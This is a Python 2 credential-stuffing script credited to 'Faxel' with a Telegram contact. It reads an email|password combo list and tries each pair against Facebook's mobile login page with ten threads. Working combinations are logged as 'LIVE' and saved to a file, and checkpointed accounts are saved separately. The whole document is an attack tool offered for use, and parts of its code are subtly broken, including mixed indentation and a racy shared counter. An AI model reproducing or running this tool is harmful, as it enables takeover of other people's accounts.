#!/usr/bin/python2
#coding=utf-8
#Dev: Faxel

from multiprocessing.pool import ThreadPool
try:
	import requests
	import bs4
except:
	import os
	print("!: requirements: bs4&requests")
	os.system("pip2 install bs4;pip2 install requests")
	
pole_nord=[]
compteur=0
pole_sud=[]
retirer=[]
ajouter=[]
sous=""

def fissure(email):
	global pole_nord,compteur,retirer,ajouter,sub
	compteur+=1
	r=requests.post(
		"https://mbasic.facebook.com/login",data=
			{
				"email":email ,
				"pass":pole_nord[compteur-1],
				"login":sous
			}
	).url
	if "save-device" in r or "m_sess" in r:
		ajouter.append(email)
		open(sauvegarder,"a+").write("%s|%s\n"%(email,pole_nord[compteur-1]))
		print("[ \033[1;32mLIVE-%s\033[0m ] %s -> %s"%(len(ajouter),email,pole_nord[compteur-1]))
		
	if "checkpoint" in r:
		retirer.append(email)
		open("faxel_controle.txt","a+").write("%s|%s\n"%(email,pole_nord[compteur-1]))
		print("[ \033[1;37m\033[31mPoint de controle-%s\033[0m ] %s -> %s"%(len(retirer),email,pole_nord[compteur-1]))
		
beau = bs4.BeautifulSoup(
	requests.get(
		"https://mbasic.facebook.com/login").text,
features="html.parser")
for x in beau("input"):
	if "login" in x["name"]:
		sous = x["value"]
print("*: separateur -> em|ps")
try:
	print("*: https://t.me/Faxelh\n")
  sauvegarder = raw_input(" Notifier ou stocker le resusltat : ")
	ouverture = open(raw_input("?: Notifier l'emplacement de votre wordlist: ")).read().splitlines()
except Exception as f:
	exit("!: %s"%(f))
for x in ouverture:
	k=x.split("|")
	pole_nord.append(k[1])
	pole_sud.append(k[0])
program=ThreadPool(10)
program.map(fissure,pole_sud)
print("-"*50)
print(" Reussir           : %s"%(len(ajouter)))
print(" Point de controle : %s"%(len(retirer)))
print(" Resultat stocker sous          : ",sauvegarder)
print(" Point de controle sctocké dans : faxel_controle.txt")
print("-"*50)
